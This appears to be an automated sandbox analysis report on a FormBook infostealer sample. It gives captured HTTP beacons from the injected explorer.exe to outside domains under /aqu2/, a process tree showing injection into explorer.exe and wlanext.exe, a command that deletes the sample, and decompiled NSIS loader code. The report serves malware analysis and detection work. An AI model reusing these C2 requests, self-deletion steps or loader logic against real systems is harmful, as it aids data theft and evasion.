68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.c
Apr 8, 2021 10:49:26.951685905 CEST	6639	IN	Data Raw: 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f Data Ascii: om/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" type="text/css" /> ... --> <link rel="stylesheet" href="//static.parastorage.com/services/wix-public/1.299.0/styles/error-pages/styles.css"> ... --></head><body
Apr 8, 2021 10:49:26.951740026 CEST	6640	IN	Data Raw: 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 73 74 61 74 69 63 73 55 72 6c 27 2c 20 27 2f 2f 73 74 61 74 69 63 2e 70 Data Ascii: <script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.299.0/'); angular.module('wixErrorPagesApp').constant('baseDomain', 'wix.com'); angular.module('wixErrorPagesApp').const
Apr 8, 2021 10:49:26.951775074 CEST	6640	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49765	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:32.039463043 CEST	6691	OUT	GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1 Host: www.dottproject.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:32.075167894 CEST	6692	IN	HTTP/1.1 301 Moved Permanently content-type: text/html; charset=utf-8 location: https://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 date: Thu, 08 Apr 2021 08:49:32 GMT content-length: 170 connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 74 74 70 72 6f 6a 65 63 74 2e 63 6f 6d 2f 61 71 75 32 2f 3f 45 68 55 74 76 78 3d 78 64 46 74 33 78 41 48 6e 58 69 54 50 4c 33 70 26 61 6d 70 3b 6d 62 79 44 3d 38 71 50 77 65 47 30 4f 6d 37 67 6e 66 78 63 74 4b 39 38 46 2f 30 64 73 6f 4c 30 6c 76 5a 75 48 34 64 30 7a 4a 2f 41 4b 6d 52 50 4d 46 35 4b 50 68 41 44 78 5a 41 6c 43 71 6d 6a 6d 6d 4b 50 35 2f 41 4f 34 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49767	104.128.125.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:37.615808010 CEST	6736	OUT	GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 Host: www.qcmax.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:38.058896065 CEST	6736	OUT	GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 Host: www.qcmax.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:38.221250057 CEST	6738	IN	HTTP/1.1 200 OK Server: Tengine Date: Thu, 08 Apr 2021 08:49:38 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 341<html><head><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49768	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:43.196348906 CEST	6739	OUT	GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1 Host: www.playfulpainters.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:43.311574936 CEST	6739	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 08 Apr 2021 08:49:43 GMT Content-Type: text/html Content-Length: 275 ETag: "605e0138-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: eQLPRPErea.exe PID: 6876 Parent PID: 5760

General

Start time:	10:48:04
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\eQLPRPErea.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\eQLPRPErea.exe'
Imagebase:	0x400000
File size:	206065 bytes
MD5 hash:	2C64897AA30694CC768F5EA375157932
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: eQLPRPErea.exe PID: 6956 Parent PID: 6876

General

Start time:	10:48:05
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\eQLPRPErea.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\eQLPRPErea.exe'
Imagebase:	0x400000
File size:	206065 bytes
MD5 hash:	2C64897AA30694CC768F5EA375157932
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6956

General

Start time:	10:48:10
Start date:	08/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wlanext.exe PID: 4832 Parent PID: 3424

General

Start time:	10:48:22
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0xea0000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6616 Parent PID: 4832

General

Start time:	10:48:26
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6648 Parent PID: 6616

General

Start time:	10:48:26
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: eQLPRPErea.exe PID: 6876 Parent PID: 5760 eQLPRPErea.exeCOMMON

Executed Functions

Function 00403166, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282
stringfilecomCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x42f4d0 = _t31;
				SHGetFileInfoA(0x429860, 0,  &_v356, 0x160, 0); // executed
				E004059DB("arability Setup", "NSIS Error");
				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403132(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\jones\\Desktop\\eQLPRPErea.exe\" ";
					DeleteFileA(_t96); // executed
					E004059DB(_t96, GetCommandLineA());
					 *0x42f420 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\jones\\Desktop\\eQLPRPErea.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M00435001;
					}
					_t43 = CharNextA(E00405513(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E00405513(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059DB("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E0040351D();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x42f4b4;
											if( *0x42f4b4 != 0) {
												_t106 = E00405CEE("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CEE("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CEE("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x42f4cc;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052DB(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x42f434 == _t46) {
										L31:
										 *0x42f4cc =  *0x42f4cc | 0xffffffff;
										_v396 = E00403542();
										goto L32;
									}
									_t103 = E00405513(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x428c60 = 0x22;
											lstrcatA(0x428c60, _t89);
											lstrcatA(0x428c60, "Au_.exe");
											DeleteFileA(0x428c61);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x42f420, 0x429460, 0x400) + 0x42945a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x429460, 0x428c61, 0) != 0) {
												E00405723(0x428c61, 0);
												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
													E0040552F(0x429460);
												} else {
													E004059DB(0x429460, "C:\\Users\\jones\\AppData\\Local\\Temp");
												}
												lstrcatA(0x428c60, "\" ");
												lstrcatA(0x428c60, _v400);
												lstrcatA(0x428c60, " _?=");
												lstrcatA(0x428c60, 0x429460);
												E004054E8(0x428c60);
												_t78 = E00405263(0x428c60, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055C8(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059DB("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E004059DB("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403132(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}

0x0040316f
0x00403172
0x00403176
0x0040317b
0x00403180
0x00403187
0x0040318d
0x004031a3
0x004031b3
0x004031b8
0x004031c3
0x004031c9
0x004031ce
0x004031d0
0x004031f6
0x004031f6
0x004031fc
0x0040320a
0x0040321e
0x00403223
0x00403225
0x00403227
0x0040322c
0x0040322c
0x0040323c
0x00403242
0x004032ab
0x004032ab
0x004032ad
0x004032af
0x00000000
0x00000000
0x00403248
0x0040324b
0x00403253
0x00403253
0x00403256
0x0040325b
0x0040325d
0x0040325d
0x0040325e
0x0040325e
0x00403263
0x00403266
0x0040329b
0x004032a0
0x004032a5
0x004032a8
0x004032aa
0x004032aa
0x004032aa
0x00000000
0x00403268
0x00403268
0x00403269
0x0040326c
0x00403274
0x00403277
0x00403279
0x00403279
0x00403279
0x00403277
0x0040327c
0x00403282
0x0040328a
0x0040328d
0x0040328f
0x0040328f
0x0040328f
0x0040328d
0x00403292
0x00403299
0x004032b3
0x004032b7
0x004032c0
0x004032c5
0x004032c6
0x004032cb
0x004032cf
0x00403332
0x00403332
0x00403337
0x0040333f
0x0040346a
0x00403471
0x0040348d
0x0040349a
0x004034a3
0x004034a5
0x004034a7
0x004034a9
0x004034ab
0x004034ad
0x004034af
0x004034bf
0x004034c1
0x004034c3
0x004034d0
0x004034df
0x004034e7
0x004034ef
0x004034ef
0x004034c3
0x004034af
0x004034ab
0x004034f4
